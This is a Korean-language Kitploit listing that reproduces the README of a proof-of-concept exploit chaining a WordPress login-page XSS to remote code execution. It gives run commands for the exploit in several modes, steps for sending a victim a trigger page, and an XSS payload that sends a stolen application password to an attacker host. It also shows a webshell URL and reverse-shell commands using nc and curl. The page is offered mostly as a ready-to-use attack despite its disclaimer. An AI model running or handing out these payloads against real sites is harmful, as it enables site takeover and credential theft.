Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XSS2Shell-CVE-2026-64638 — CVE-2026-64638 — WordPress 인증 전 반사형 XSS → DOM Clobbering을 통한 RCE + 애플리케이션 비밀번호 탈취 + REST API 플러그인 활성화. 이중 모드 PoC (XSS 체인 및 직접 모드). | Kitploit
도구/GitHubGitHub/jendmaoul/xss2shell-cve-2026-64638
ExploitationWeb Application ExploitationPost-ExploitationWeb SecurityPenetration TestingRed TeamingPayload Development
GitHubjendmaoul/xss2shell-cve-2026-64638

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

XSS2Shell-CVE-2026-64638

CVE-2026-64638 — WordPress 인증 전 반사형 XSS → DOM Clobbering을 통한 RCE + 애플리케이션 비밀번호 탈취 + REST API 플러그인 활성화. 이중 모드 PoC (XSS 체인 및 직접 모드).

저장소 보기웹사이트
1481개월 전아직 검토되지 않음
공유

CVE-2026-64638 — XSS2Shell

WordPress 사전 인증 반사형 XSS → 원격 코드 실행 체인

DOM Clobbering + 애플리케이션 비밀번호 탈취 + REST API 플러그인 활성화 = 전체 RCE

Python CVE License


⚡ 개요

CVE-2026-64638은 WordPress wp-login.php에서 발견된 치명적인 사전 인증 반사형 XSS 취약점입니다. 이 취약점은 로그인 오류 메시지가 제출된 사용자 이름을 적절한 HTML 인코딩 없이 반사하기 때문에 발생하며, <area id=ajaxurl>을 이용한 DOM Clobbering으로 대부분의 필터를 우회할 수 있습니다.

이 XSS는 WordPress의 애플리케이션 비밀번호 기능과 연결되면 완전한 원격 코드 실행 경로가 됩니다. 로그인 상태에서 조작된 트리거 페이지를 방문하는 것 외에는 어떤 사용자 상호작용도 필요하지 않습니다.

공격 체인

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  [1] XSS (Reflected)                                            │
│      wp-login.php reflects <area id=ajaxurl> in username error   │
│                          ↓                                       │
│  [2] DOM Clobbering                                             │
│      <area id=ajaxurl> hijacks wp-admin JS → auto-submits form   │
│                          ↓                                       │
│  [3] Application Password Theft                                 │
│      XSS redirects victim to authorize-application.php           │
│      success_url callback captures app password                  │
│                          ↓                                       │
│  [4] REST API Plugin Activation                                 │
│      App password → Basic Auth → wp-json/wp/v2/plugins → active  │
│                          ↓                                       │
│  [5] Webshell RCE                                               │
│      Plugin PHP webshell → uid=33(www-data)                      │
│      Reverse shell also available                                │
└─────────────────────────────────────────────────────────────────┘

🎯 영향을 받는 버전


📦 요구 사항

root@kitploit:~
pip3 install requests

이것뿐입니다. 나머지는 전부 Python 3.8+ 표준 라이브러리로 해결됩니다.


🚀 사용법

빠른 시작

root@kitploit:~
# Clone
git clone https://github.com/linuxhackingid/XSS2Shell-CVE-2026-64638.git
cd XSS2Shell-CVE-2026-64638

# Auto mode (recommended)
python3 poc_fixed_v2.py --mode auto -u USER -p PASS --lhost YOUR_IP http://target.com

모드 1: 자동 (감지 후 최적 모드 선택)

root@kitploit:~
python3 poc_fixed_v2.py -u admin -p password123 --lhost 192.168.1.100 http://target.com
  • XSS 가능 여부를 감지 → XSS 체인 사용
  • XSS가 패치된 경우 직접 자격 증명 모드로 폴백

모드 2: XSS 체인 (자격 증명 불필요!)

root@kitploit:~
# Terminal 1: Run the exploit (starts callback server)
python3 poc_fixed_v2.py --mode xss --lhost 192.168.1.100 http://target.com

# Terminal 2: Host the trigger page
cd /path/to/XSS2Shell-CVE-2026-64638
python3 -m http.server 8000

# Send victim: http://192.168.1.100:8000/trigger_target.com.html

피해자는 WordPress에 관리자로 로그인되어 있어야 합니다. 트리거 페이지는:

  1. 숨겨진 iframe을 통해 XSS 페이로드를 wp-login.php에 자동 제출합니다
  2. 피해자가 승인하도록 authorize-application.php를 엽니다
  3. 콜백 서버를 통해 애플리케이션 비밀번호를 캡처합니다
  4. REST API에 사용하여 웹셸 플러그인을 활성화합니다

모드 3: 직접 (자격 증명 필요)

root@kitploit:~
python3 poc_fixed_v2.py --mode direct -u admin -p password123 http://target.com

직접 로그인 → 플러그인 업로드 → 즉시 웹셸. XSS가 필요 없습니다.

리버스 셸

root@kitploit:~
# In one terminal
nc -lvnp 4444

# In another — the exploit auto-triggers reverse shell when --lhost is set
python3 poc_fixed_v2.py --mode direct -u admin -p pass --lhost 192.168.1.100 --lport 4444 http://target.com

또는 웹셸을 통해 수동으로:

root@kitploit:~
curl 'http://target.com/wp-content/plugins/xss2shell/xss2shell.php?rev=YOUR_IP:4444'

📂 파일

root@kitploit:~
XSS2Shell-CVE-2026-64638/
├── poc_fixed_v2.py              # Main exploit script (dual-mode)
├── poc.py                       # Original PoC (for reference)
├── trigger_192.168.0.87.html    # Example trigger page
└── README.md                    # This file

🔬 기술 세부 사항

XSS 페이로드

root@kitploit:~
< area id=ajaxurl shape=default href="http://attacker:9090/collect" >
<button id="wp-auth-check" onclick="window.ajaxurl='http://attacker:9090/collect'">x</button>

작동 원리:

  • WordPress의 sanitize_user()는 표준 HTML 태그를 제거하지만 앞에 공백이 있는 <area>는 놓칩니다
  • <area id=ajaxurl>는 DOM Clobbering을 수행합니다. 즉, wp-admin JavaScript가 사용하는 window.ajaxurl을 가로챕니다
  • wp_auth_check 인터벌이 실행되고 XSS가 피해자를 authorize-application.php로 리다이렉트합니다
  • success_url 매개변수가 생성된 비밀번호를 공격자의 콜백 서버로 보냅니다

익스플로잇 이후 단계

애플리케이션 비밀번호를 캡처하면:

  • REST API: /wp-json/wp/v2/에 피해자로 인증합니다
  • 플러그인 활성화: POST /wp-json/wp/v2/plugins/{slug}를 {"status":"active"}와 함께 호출합니다
  • 웹셸: wp-content/plugins/xss2shell/xss2shell.php?cmd=COMMAND에 접근합니다
  • 리버스 셸: ?rev=IP:PORT가 공격자에게 /bin/sh -i를 실행합니다

✅ 확인된 환경


⚠️ 면책 조항

이 도구는 승인된 보안 테스트 및 연구용으로만 사용하십시오. 저자는 오용에 대한 책임을 지지 않습니다. 테스트 전에 항상 서면 허가를 받으십시오.


📝 크레딧

  • PoC 개발: linuxhackingid
  • CVE: CVE-2026-64638

"익스플로잇이 없으면 리포트도 없다." — Shannon 방법론

도구 다운로드
버전상태비고
WordPress ≤ 6.9.5✅ 취약백포트 이전 Docker 이미지는 여전히 악용 가능
WordPress 6.9.6+⚠️ 패치됨 (2026년 8월 7일 백포트)8월 7일 이후 재빌드된 Docker 이미지에는 수정 사항 포함
WordPress 7.0.x✅ 취약7.0.2에서 확인됨
WordPress 7.1+❓ 알 수 없음테스트되지 않음
대상버전모드결과
Docker (로컬)WordPress 7.0.2XSS Chain✅ www-data로 RCE
Docker (로컬)WordPress 7.0.2Direct✅ www-data로 RCE
Docker (로컬)WordPress 6.7XSS Chain✅ www-data로 RCE